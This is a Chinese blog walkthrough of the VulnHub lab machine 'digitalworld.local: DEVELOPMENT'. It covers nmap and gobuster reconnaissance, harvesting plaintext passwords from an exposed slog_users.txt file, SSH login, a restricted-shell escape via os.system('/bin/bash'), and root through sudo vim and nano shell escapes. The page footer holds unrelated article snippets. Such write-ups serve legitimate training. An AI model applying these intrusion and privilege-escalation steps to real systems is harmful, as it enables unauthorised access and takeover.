digitalworld.local: DEVELOPMENT靶场

最新推荐文章于 2025-05-19 19:54:30 发布
最新推荐文章于 2025-05-19 19:54:30 发布
阅读量1.1k 收藏 13
点赞数 30
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhongyuekang820/article/details/147994541
版权

digitalworld.local: DEVELOPMENT

来自 <https://www.vulnhub.com/entry/digitalworldlocal-development,280/>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.250

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.250

开放端口与服务分析

  1. SSH (22/tcp)
  • 版本: OpenSSH 7.6p1 (Ubuntu 4)
  • 潜在风险:
    • 检查已知漏洞(如CVE-2020-15778),但此版本相对安全。
    • 弱密码或密钥泄露风险,建议爆破或检查授权密钥。
  • 行动: 尝试用户名枚举(如patrick)或密码爆破(若允许)。
  1. Ident (113/tcp)
  • 服务未明确识别,通常用于身份验证,但渗透价值较低,可暂缓处理。
  1. SMB (139/tcp & 445/tcp)
  • 版本: Samba 4.7.6-Ubuntu (伪装为Windows 6.1)
  • 关键发现:
    • 消息签名启用但未强制(易受中间人攻击)。
    • 允许Guest访问,可能存在匿名共享。
  • CVE-2017-7494 (SambaCry) 检查是否可上传共享库触发RCE。
  • 行动:
    • 枚举共享:smbclient -L //192.168.23.250 -N
    • 检查可写共享并尝试上传恶意文件。
  1. HTTP (8080/tcp)
  • 服务: IIS 6.0(可能为反向代理或误报)
  • 页面线索:
    • 提示查看 /html_pages 目录。
    • 注释提及秘密页面和用户Patrick。
  • 潜在漏洞:
    • 目录遍历(如 /html_pages../)。
    • 隐藏路径(如 /secret、/dev)。
  • 行动:
    • 目录爆破:gobuster dir -u http://192.168.23.250:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    • 检查 /html_pages 下的敏感文件(如配置文件、备份)

4,访问8080端口存在的http服务

发现不能扫描网站子目录

根据首页html的提示内容访问一下 http://192.168.23.250:8080/html_pages

http://192.168.23.250:8080/development.html

查看页面源代码发现提示,访问一下

http://192.168.23.250:8080/developmentsecretpage/

点击就会跳转到登录页面

http://192.168.23.250:8080/developmentsecretpage/patrick.php

再点击进入登录页面

http://192.168.23.250:8080/developmentsecretpage/patrick.php?logout=1

5,对网站存在的漏洞进行挖掘利用。首先弱密码尝试一下登录,跳转到一个会报错的页面

了解一下这个文件是什么

原来存在一个CVE漏洞,尝试阅读exp技术文件

searchsploit 7444 

searchsploit -m 7444.txt

文件包含漏洞原理

  • 触发点: 用户凭证明文存储在 slog_users.txt 文件中。
  • 默认路径: 通过 slogin_lib.inc.php 定义,默认可直接访问。
  • 风险: 攻击者可直接下载此文件获取所有用户名和密码。

访问得到账户密码

http://192.168.23.250:8080/developmentsecretpage/slog_users.txt

6,然后ssh登录,密码12345678900987654321

 ssh intern@192.168.23.250

信息收集一下,发现使用的命令有限

开启一个bash

echo os.system('/bin/bash')

发现当前文件夹存在几个txt文件,查看之

提示切换到另一个用户patrick,密码是P@ssw0rd25(原来是因为禁止远程登录这一个ssh用户)

7,信息收集,查看怎么提权

那么就存在两类方法提权:

vim方法

sudo vim -c ':!/bin/sh'

nano方法

sudo nano
^R^X
reset; sh 1>&0 2>&0

freesec
关注
pytorch报错 ERROR:torch.distributed.elastic.multiprocessing.api:failed (exitcode: 1) local_rank:....
科研学习笔记!
06-26 1万+
pytorch报错 ERROR:torch.distributed.elastic.multiprocessing.api:failed (exitcode: 1) local_rank:....
Vulnhub:Digitalworld.local (Development)靶机
qq_43884092的博客
04-09 651
访问development目录,提示存在一个流量包,查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php,访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错,根据报错搜索关键字
OSCP-DIGITALWORLD.LOCAL DEVELOPMENT靶场复现
weixin_69678131的博客
04-03 667
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者和此公众号不为此承担任何责任。跟hackersecretpage,还有一个/test.pcap前两个访问了之后没有任何信息,那就下载一下流量包来看一下。再次登录之后发现了2条报错信息,很重要好看一下,其中ereg_replace()函数,我们来看一下是否有什么漏洞。之后对所有内容进行一下翻译,发现了一些有用的信息,用户David,还有一些二进制。解密出了一个HUH?
靶机渗透练习58-digitalworld.local:VENGEANCE
hirak0的博客
04-19 1935
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-vengeance,704/ Description 2021 brings us the VENGEANCE of digitalworld.local! A box born out of COVID-19. This machine was built whilst the author was mulling over life in infosec whilst doing hi
靶机渗透练习59-digitalworld.local:snakeoil
hirak0的博客
04-19 1554
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-snakeoil,738/ Description Recently, Good Tech Inc. has decided to change their application development process. However, their applications look broken and too basic. Is this an application full
靶机渗透练习57-digitalworld.local:JOY
hirak0的博客
04-19 4476
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ Description Does penetration testing spark joy? If it does, this machine is for you. This machine is full of services, full of fun, but how many ways are there to align the stars? Perhaps
Vulnhub靶机:DIGITALWORLD.LOCAL_ DEVELOPMENT
LainWith的博客
01-12 760
(此系列共9台)发布日期:2018 年 12 月 28 日难度:中级运行环境:Virtualbox运行失败,VMware运行成功目标:取得 root 权限备注:OSCP类型靶机,靶机容易崩溃主机发现端口扫描+漏洞扫描错误信息泄露破解hashlshell绕过sudo提权。
vulnhub靶场之【digitalworld.local系列】的development靶机
China_I_LOVE的博客
03-03 745
对于网站,可能存在注释设计者忘记删除,往往会暴露敏感信息对于网站的链接,功能等,都需要进行测试对于网站的漏洞,不要只盯着CMS,一些语言函数也可能是有漏洞的对于ssh无法登录时,不代表su无法切换,密码都是一样的,但是ssh可能做了限制对于提权,这里采用sudo提权的方式。
vulnhub靶场digitalworld.local DEVELOPMENT
qq_58091216的博客
10-19 797
发现是CVE-2008-5762有关,可以导致远程文件包含,最主要的是slog_users.txt文件。我们看到一串英文,我们进行翻译,让我们访问html_pages页面。我们输入admin:123456,发现报错了,我们进行查看。我们可以看到权限是root权限,我们查看flag。我们进行访问,发现是一个登录页面,我们进行查看。提示我们切换到patrick用户,我们进行切换。,然后我们查看源代码,发现一个新的目录。可以看到4个用户名和密码,我们进行查看。我们可以看到2个文件,我们进行查看。
笔记40-60
2201_75378806的博客
03-27 1178
当列表长度大于2的时候,设置files前两个元素的路径,然后比较当前用户home目录下的json文件名中的时间和/tmp目录下json文件名中的时间,根据比较结果返回对应的json文件。查看里面的信息后,看下log.py这个脚本,发现clear.log会每分钟开头执行一次,看源码分析,每分钟都会清理日志的意思,他会调用log.py,虽然可以利用,但是他这个脚本只能看,不能改,然而之前的script文件夹可是满权限,那么就可以让这个log.py文件改名,让我们自己写的脚本变为log.py。
靶场digitalworld.local: VENGEANCE
03-30
没有截图,但是有用的东西,全部都写上了 。一步一步来就能得到root。每一步都有描述,都有讲解。其中没有的部分,就没有卸载wp中,也不用操作,少走弯路。
vulnhub靶场合集之NOOB: 1靶场渗透
weixin_62297109的博客
06-04 1200
今天继续做靶场渗透,上午做了个中难度的靶场,便秘啊。。
java.lang.UnsatisfiedLinkError: /usr/local/jdk1.8/jre/lib/amd64/libawt_xawt.so: libXext.so.6: cannot
zhang7491的博客
05-16 9368
写的ssm项目 想把文字转成图片  写完了本地可以实现,但是服务器上就报错想请各位大佬看一看 Could not complete requestorg.springframework.web.util.NestedServletException: Handler dispatch failed; nested exception is java.lang.UnsatisfiedLinkErro...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8700
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
使用Spring Boot和Spring Security构建安全的RESTful API
intwei的博客
05-17 734
本文详细介绍了如何使用Spring Boot和Spring Security构建安全的RESTful API,并结合JWT实现身份验证与授权。通过实际代码示例,帮助开发者快速上手。完整的项目代码可以在GitHub上找到。
WEB安全--Java安全--CC1利用链
m0_74800552的博客
05-14 1527
CC1利用链的原理与构建方式
TDengine 安全部署配置建议
最新发布
TDengine(老段)专注时序数据库领域
05-19 683
数据安全是 TDengine 产品的一项关键指标,这些措施旨在保护 TDengine 部署免受未经授权的访问和数据泄露,同时保持性能和功能。但 TDengine 自身的安全配置不是生产中的唯一保障,结合用户业务系统制定更加匹配客户需求的解决方案更加重要。
Linux安全第一章-iptables防火墙
2401_85836041的博客
05-15 681
目录目录#1.1Linux防火墙基础。
UWB定位方案在水力发电站人员安全的应用推荐
weixin_42730005的博客
05-16 624
水力发电站具有‌环境复杂‌(金属设备密集、高温高压区域多)、‌安全风险高‌(人员误入高危区域易引发事故)等特点,传统定位技术难以满足精度与可靠性要求。品铂科技基于UWB的高精度定位系统已在多地大型水电站成功落地,如‌白鹤滩水力发电站‌项目中实现人员实时定位与高危区域管控。
env 和env.dev和env.development和env.production和env.local.development
12-07
.env是一个全局默认的配置文件,无论在什么环境下都会被加载和合并。而.env.development是在开发环境下的配置文件,.env.production是在生产环境下的配置文件。这些文件中可以定义环境变量和其他配置信息,例如数据库连接信息等。当环境变量被定义在多个文件中时,会按照优先级进行覆盖,例如在开发环境下,.env.development中的环境变量会覆盖掉.env中的同名变量。 .env.local.development是一个本地开发环境下的配置文件,它的优先级比.env.development更高,可以用于本地开发时覆盖掉.env.development中的配置信息。 示例代码如下: ```shell # .env文件中定义的环境变量 DB_HOST=localhost DB_PORT=5432 # .env.development文件中定义的环境变量 DB_PORT=5433 # .env.local.development文件中定义的环境变量 DB_PORT=5434 ``` 在上述示例中,最终的DB_PORT值为5434,因为.env.local.development的优先级最高。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值